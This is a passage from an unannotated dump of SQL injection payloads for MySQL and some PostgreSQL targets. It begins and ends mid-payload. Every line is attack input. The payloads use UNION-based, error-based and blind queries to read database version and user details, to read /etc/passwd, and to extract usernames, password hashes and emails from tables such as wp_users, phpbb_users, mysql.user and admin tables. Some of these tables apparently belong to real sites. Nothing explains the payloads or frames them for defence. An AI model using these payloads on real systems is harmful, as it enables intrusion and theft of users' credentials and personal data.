1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9,10,11-- -72 union select 1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9,10,11,12,13-- -72 union select 1,2 from information_schema.tables -- -72 union select 1,2,unhex(hex(concat_ws(0x3a3a,name,password))),4,5,6,7,8 from admin -- -72 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 72 union Select 1,aes_decrypt(aes_encrypt(concat(Version(),0x3a,Database(),0x3a,User()),0x71),0x71),3,4,5,6,7/* -72 union select 1,concat(username,0x3a,password),3 from users-- -72 union select 1,concat_ws(0x3a,id,username,password,name,email),3,4,5,6,7,8,9,10,11 from users where id=1-- -72 UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5/* -72 union select 1,user(),3,4,concat_ws(0x3a3a,login,pwd) from admin -- -72 union select null,user(),version(),null,version()/* 72 union select table_name,2,3,4,5,6,7,8 from information_schema.tables limit 0,1-- -73036 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13,14,15,16,17,18,19,20,21-- 730 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -730' union select table_name from information_schema.tables limit 385,1000 -- 7312' union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7/* 731 and null union select concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9,10,11/* -731 union select 1,2,3,4,5,6,concat_ws(0x3a ,user(),database(),version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -731 union select 1,concat(Nombre,char(58),Password),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from vente2_ventealcine.Usuarios -- 7320') union select 1111,2222,3333,4444,555,666/* -732 union select 1,2,3,4,5,null,concat_ws(0x3a3a,version(),user(),database()),8,9/* -7333666' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex(group_concat(concat_ws(0x3a3a,id,user,pass )))),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61 from userlist -- 7333666' UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,concat_ws(0x3a3a,version(),database(),user(),@@version_compile_os) from information_schema.tables -- 73389 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1-- 733' union select 1,2,3,4,5,6,7,8,9,10,11,concat(version(),0x3a,database(),0x3a,user()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from mysql.user limit 1,1/* -733 union select 1,LOAD_FILE('/etc/passwd'),3,4,5,6,7,8,9,9 -- -733 union select 1,user(),version(),4,concat_ws(0x3a,ID,user_login,user_pass,user_email),6,7,8,9,9 from wp_users -- -734 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,0,1,2,3,4,5,6,7,8,9 from user/* -73584' UNION SELECT 0,1,2,3,4,5,6,7,8,9,concat_ws(0x0b,user(),version(),database()),11,12,13,14 -- -735' and 0 union select 1,2,3,4,5,table_name,7,8,9,10 from information_schema.tables limit 24,1-- 73674 union select concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),2 from INFORMATION_SCHEMA.COLUMNS/* 736 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40-- -736 union select 1,2,3,4,5,6,7,8,9,10,version(),user(),database(),14,15,16,17,18/* -736 union select 1,2,3,4,concat_ws(char(58,58),user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52-- 7379 union select 1,2,3,4,5,6,7,8,unhex(hex(concat_ws(0x3a3a3a,version(),user(),database()))),10,11,12,13/* -737 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,version(),database(),user()),20,21,22,23,24,25,26-- -737 union select 1,2,3,4,5,6,7,8,9,10,concat(login,0x3a,password,0x0b),12,13 from users limit 0,30 -- -737' union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,0 -- 7381' and (select 1 from (select count(0),concat((select concat_ws(0x3a,database(),version(),user())),floor(rand(0)*2)) from information_schema.tables group by 2)a)-- -739 union select 1,2,3,4,5,6,7,version(),9,10,11,12 from userlist-- -739 union select concat_ws(0x3a,rocid,password),2 from user# 73' aNd 1=0 UNION SELECT 1,2,3,version(),5,6,7,8 -- 73 and bin(15)!=1111 union(select distinct 1,2,3,4,5,6,7,group_concat(uname,':',pword) from mnb_members where pword between 0 and 1 order by uname asc) 73 limit 0 UNION SELECT 1,2,3,4,5,6,7,CONCAT(Version(),Database(),User()),9,10,11,12,13-- 73 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9-- -73 UnIoN SeLeCt 1,2,3,4,5,6,7,Concat_ws(0x3a3a,Username,User_password,User_email),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from phpbb_users -- -73 union select 1,2,3,4,convert(concat(version(),0x3a,user(),0x3a,database()) using latin1),6,7,8,9,10 from user/* -73 union select 1,2,3,4,group_concat(concat_ws(0x3a,ID,Username,Password,FName,LName,LastUpdate,AccessLevel)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from WBtblUser-- -73 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables -- -73 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 73' union select 1,2,3,id,5 from user/* -73 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),4,5,6,7,8,9,10,11,12,13-- -73 union select 1,2,concat(login,char(58),password),4,5,6,7,8,9,10,11 from admin-- -73 union select 1,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),3 from information_schema.tables limit 0,1-- -73 union select 1,concat_ws(0x3a3a,id,prefix,prenom,nom,titre,affiliation),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from membres -- -73' UNION SELECT 1,group_concat(column_name),3,concat_ws(0x3a3a,database(),user(),version(),@@version_compile_os),5,6,7,8 FROM INFORMATION_SCHEMA.COLUMNS where table_name=char(97,117,116,104,114,101,103) -- -73 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables-- -73 union select concat(version(),0x20,database(),0x20,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -73' union select null,null,null,null,null,concat_ws(char(32,124,32),version(),user(),database(),@@version_compile_os),null,null,null,null -- 7' /*!40024 and ascii(lower(substring(version(),1,1)))>51*//* -74034 union select 1,2,3,concat(user(),version(),database()),5 -- -7414' union select 1,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14 -- 742' union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user()),8,9,10,11,12-- -743 union select 1,concat_ws(0x2f,version(),user(),database()),3,4,5,6,7,8,9/* -744 union select 1,2,convert(concat_ws(0x3b,password,user)using latin1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from mysql.user -745' union select 1,2,3,4,5,6,7,8,9,10,11,concat(user(),0x3a,database(),0x3a,version()),13,14,15,16,17/* -7465 union select database(),version(),user(),4,5,6/* -7468 union select 1,concat_ws(char(58),user(),version(),database(),@@version_compile_os),3,4,5,6 -746 union select concat(user(),0x0B,database(),0x0B,version()) -- -746' union select concat_ws(0x3a,version(),user())-- -747 select union 1,2,3,4,5,6/* -747 union select 1,2,3,4,5,6,7,8,9,10,11,group_concat(concat_ws(0x3a,username,password,email) separator 0x0a),13,14 from users/* 748 union select 111,222,333,444,555,user(),777,888,999-- -748' union select 1,2,concat_ws(0x3a3a,ID,UserName,Password,NeedPasswordChange,LastLogin,FailedLogins,AuthGroupID),4,5,6,7,8 from auth_users -- -748 union select Unhex(HEx(user())),2,3 -- -7491 union select 1,2,3,passwd,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 from users -- -7496 union select null,2,3,4,concat_ws(0x3a,username,user_password) from users -- -74984' union select 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 -- 74-999 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13-- 749' union select 1,2,concat_ws(0x3a,user(),database(),version()) -- -749 union select 1,concat_ws(0x3a3a,MemberID,FirstName,LastName,Username,Email,Password,SuperUser,HomePageURL),3,4,5,6,7,8 from Personal where SuperUser=1 limit 1,1 -- -74' or(1,1)=(select count(0),concat((select version() from information_schema.tables limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- 74 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))/**/ -74 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* -74 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables -- -74 union select 1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15,16 -- 74' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2/* -74 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),@@version_compile_os,version()),8,9,10,11,12-- -74 union select 1,2,3,4,5,password,7,8,9,10 from mysql.user/* 74 union select 1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.tables-- 74 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,user_name,0x3a,user_password),0x71),0x71),6,7,8,9,10,11 FROM bd_users LIMIT x,1 -74 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11 74 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7-- 74' union select 1,2,3,concat(username,0x3a,password),5,6,7,8 from admin/* -74 union select 1,2,3,concat_ws(0x3a,version(),database(),useR()),5,6,7,8,9,10,11,12,13,14 -74 union selecT 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,0,1-- -74 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10 from information_schema.tables-- 74' union select 1,2,3,id,5,6,7,8 from user/* 74 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13 LIMIT 1,1-- -74 UNION SELECT 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- 74 union select 1,concat(0x2a,version(),user(),database()) 74 union select 1,concat_ws(0x2a,version(),user(),database()),3,4,5,6,7-- -74 union select 1,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9 -- 74 union select 1,concat_ws(char(1),version(),database(),user()),load_file(0x2F6574632F706173737764),4,5,6,7,8,9,10 admin/* -74 union select 1,concat_ws(char(58,58),user(),database(),version()),3,4,5/* -74 union select 1,group_concat(table_name),3,4,5 from information_schema.tables-- -74 union select 1,version(),3,4,5,6,7,8,9,10,11-- -74 union select 1,version(),3,4,5,6,7 from news/* 74 UNION SELECT CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1),0x7873716C696E6A656E64) LIMIT 1,1/* 74 union select concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12-- -74 union select version(),2,3,4,user(),6,7/* 75018 union select AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),version(),char(58),database()),0x71),0x71),2/* -750 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16-- -7511 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18 7516 union select concat_ws(0x2a,version(),user(),database()) limit 1,1/* -75176 UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -7517 union select 1,2,3,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from user/* 75189' union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 limit 1,1/* 7518 union selecT version(),database(),3,user(),5, -751 union select 1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper),5,6,7,8,9,10,11,12 from nuke_authors where radminsuper=1 limit 5,1 -- -7522 union all select 1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13 from sbjks_admin-- -753 union select 1,2,concat_Ws(0x3a3a,uid,name,uname,email,pass,level,user_icq),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from xoops_users limit 1,1 -- -753 UNION SELECT CONCAT_WS(0x3a,id,username,parola),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM cg.admini LIMIT 1,1-- -7548 union select 1,2,version(),database(),user(),6,7,8,9,10,11,12,13,14 -757 union select 1,2,table_name,4,5,6,7,8,9,10,11,12 from information_schema.tables -- 757 union select 1,2,version(),4,5 -- -75829 union select version(),USER(),version(),version(),version(),version(),version(),version(),version(),version()-- -7590 union select concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10-- -7596 UNION SELECT 1,2,3,4 FR -759 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(column_name),15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_name=0x74625F75736572-- -759 unIOn sELEct 1,2,3,4,5,6,7,8,concat_ws(0x3a3a,login,password),10,11,12,13,14,15,16,17,18,19,20,21,22 from usuarios limit 4,1 -- 75 and 0 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8-- 75 and 1=3 union select 1,2,convert(user(),binary),4,5/* 75 union select 0,1,username,3,4,password from admin -75 uNIon seLEct 1,2,3,4,5 /* -75 /*!UnIoN*/ /*!SEleCT*/ 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,concat_ws(0x3a,version(),user(),database()),17 -- -75 union select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,concat(version(),0x3a,database(),0x3a,user()),16/* -75 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33-- -75 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),17,18,19,20,21,22,23,24,25 -75 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9/* -75 union select 1,2,3,4,user(),5,6/* -75 UNION SELECT 1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17 from users/* -75 union select 1,2,concat_ws(0x3a,table_name,version()),4,5,6 from information_schema.tables limit 27,1/* 75 union select 1,2,concat_ws(':',version(),database(),user()),4,5,6,7,8,9 -75 union select 1,2,version(),database(),user(),6 from users-- -75 union select 1,concat_ws(0x2f,version(),user(),database()),3,4,5/* 75' union select 1,convert(concat(user(),0x3a,version(),0x3a,database()) using cp1251)/* -75 union select 1,group_concat(SCHEMA_NAME),3,4,5,6,7,8 FROM INFORMATION_SCHEMA.SCHEMATA-- -75 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/ -75 union select 1,version(),3,4,5,6,7,8,database(),10,11,12,user(),14-- -75 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10 -- -75 union select passone,2,3,4 from cmc.users/* -75 union select user(),2,version(),4,database(),6/* -7603 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2-- -7603 union select 1,group_concat(0x0b,name,0x3a3a,password,0x3a3a,email),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from links_members-- -7603 union select 1,group_concat(0x0b,user_login,0x3a3a,user_pass,0x3a3a,user_email),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from optart_users-- -7603 union select 1,group_concat(0x0b,username,0x3a3a,user_password,0x3a3a,user_email),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from phpbb_users-- -7626 UNION SELECT 1,2,concat_ws(0x2b,user(),database(),version()) 762-999.9 union select 1,user(),version(),database(),5,6,7-- -762 union select 1,2,3,4,5,6,group_concat(table_name),8,9,1,2,3,4,5 from information_schema.tables where table_schema!='information_schema'-- -762 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14-- -763 union select 1,2,concat_ws(char(58,58),user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39-- 764 order by 6 -- 7654554798 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8-- -7665 union select 1,2,3,4,concat(name,char(58),passcaddieuser,char(58),email),6 from cataloguepode_caddieusers-- -7669 union select version(),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77/* -766 union select 1,2,version()-- -767 union select 1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 768809777 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15-- -768 union all select 1,2,3,4,5,6,7,8,9,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 -- -768' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables -- 768 union select 1,concat_ws(0x3a,111,user(),database(),version()),3-- 769 and 1=2 union all select 1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from user where userid=21000-- 76' aNd 1=0 UNION SELECT 1,2,version() -- 76 and 1=0 UnIon selECt 1,group_concat(schema_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 From information_schema.schemata -- -76 and 1=2 union select 1,2,concat_ws(char(58),version(),user(),database(),@@version_compile_os),4,5,6,7-- 76' and substring(version(),1,1)=3/* -76 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84-- -76 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 -- -76 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),useR()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -76 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -76 union select 1,2,3,4,5,concat(host,char(58),user,char(58),password),7,8 from mysql.user -76 union select 1,2,3,4,concat_Ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13-- -76 UNION SELECT 1,2,3,4,convert(user() using latin1),6,7,8/* 76 UNION SELECT 1,2,3,4,group_concat(user_login,0x3B,user_pass SEPARATOR 0x0b),6,7,8,9 FROM whap_wp.wp_users -76 union select 1,2,3,AES_DECRYPT(AES_ENCRYPT(concat_ws(char(58,58),user(),database(),version()),0x73),0x73),5,6,7,8,9,10,11,12,13,14,15/* -76 UNION SELECT 1,2,3,cast(concat_ws(0x3a,version(),database(),user(),@@version_compile_os) as binary),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61-- -76 union select 1,2,concat(username,char(58),password),4,5,6,7 from users-- -76 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11-- -76' union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13 /* -76 UNION SELECT 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9 from sup_people-- -76 /*!union select*/ 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 76 union select 1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from mysql.user/* -76 union select 1,concat_ws(0x3A,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- -76 union select 1,user(),3,4 from mysql.user-- -76 union select concat_ws(username,user_password,user_email),2,3 from phpbb_users-- -7704 union select database(),2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 770583' and 1=0 UnIon selECt 1,2,concat_ws(0x3a,username,password,admin_email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin limit 0,1 -- 770 or 1 group by concat((concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os)),rand(0)|0) having min(0)-- 771709480980 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- 772 AND (SUBSTRING((version()),1,1))=3/* -772' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3A3a,name,pwd),20,21,22,23,24,25,26,27,28,29,30,31,32,33 from admin/* -772' union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,name,pwd),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from admin/* 772 union select 1,concat_ws(0x2F,user(),version(),database()),3,4,5,6,7/* -772 union select 1,username,3,4,5,6,7,8,9,10,11,12 from ltw_usersv4/* -773 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(char(58),user(),version(),database()),16,17,18,19,20,21,22,23,24,25,26/* -773 union select 1,login,passwd,4,5,6,7,version(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from users/* -7743' union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14-- -774 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from users/* -77501 union select 1,concat_ws(char(58),user(),version(),database()),3,4,5,6,7,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/* -77571 union select 1,2,3,4,5,6,7,8,9,0,1,2,concat_ws(0x3a,username,password,email),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 from mob_users limit 5110,1/* -77571 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 from mob_users/* -77571 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,userid,username,displayname,email,realmail,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 from mob_users limit 15741,1/* -775 union select 1,password,zip,4,5,email,id,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,24,24,25,26,27 from members/* -776 union select user(),version(),3,4 -7777 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9-- 777 union select 1,2,3,4,5,6,table_name,8,9,0,1,2,3,4,5,6 from information_schema.tables/* -777 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* -777 union select 1,concat_ws(0x3a3a3a3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13-- -778 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(version(),0x3a,user()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/* -778 union select 1,2,3,4,5,6,unhex(hex(usER_LOgin)) from users -- 7795 union select 1,2,3,version(),user(),6,database(),8,9,10,11,12,13 -- -779 union select 1,2,3,4,group_concat(concat_ws(0x3a,id_member,member_name,id_group,passwd,password_salt)),6,7,8,9,10,11,12,13,14,15 from u51903_forum.smf_members where id_group=1 -- 77 and 1=0 UnIon selECt 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=0x4236373930395f753335323330-- 77 and 1=-1 union select 1,2,3,4,5,6 from information_schema.tables/* 77 and 1=(select version()||current_user)::int-- 77 and ascii(lower(substring(version(),1,1)))=0x33/* -77 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,version(),28,29,30/* -77 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15 -77 union select 1,2,3,version(),concat(user(),char(59),database())/* -77 union select 1,2,concat_ws(char(58,58),user(),database(),version()),4,5,6,7/* -77' union select 1,2,user,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from mysql.user/* 77' union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 limit 1,1/* -77 union select concat_ws(0x3a,user(),version(),database(),@@version_compile_os),2 77 UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- -77 union select version(),user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/* -780 union select 1,2,3,concat(id,0x3a,name,0x3a,password,0x3a,email),5 from users limit 1258,1/* -780 union select 1,2,concat_ws(0x3a,user(),database(),version(),@@version_compile_os,@@tmpdir,@@datadir,@@basedir),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- -7811 union select 1,2,concat_ws(0x3a,table_name),4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.tables limit 16,1/* 7814 union select 1,2,version() from mysql.user/* 781 and 1=0 UnIon selECt 1,2,version(),4,5,6,7,8,9,10,11,12,13 -- 781 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5/* 78221 UNION SELECT 1,2,concat_ws(name,0x3a,username,0x3a,icq,0x3,email),4,5,6,7 from users/* -783 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74/* 7842' group by 19 /* 784 and 1=cast((SELECT version()||chr(58)||current_user||chr(58)||current_database()) as int)-- -784 union select 1,2,3,concat(database(),0x3a,user(),0x3a,version()),5,6/* -784 union select 1,2,3,concat(database(),0x3a,version(),0x3a,user()),5,6/* -785 union select 1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8,9-- -786 union select 1,2,3,4,5,6,7,8,9,10,11,12 from Employees/* -78700' union select concat_ws(0x3a,version(),user(),database(),@@version_compile_os)-- 78 and 1=0 union select group_concat(schema_name),2 from information_schema.schemata-- -78 unIOn sELEct 1,2 -- -78 union select 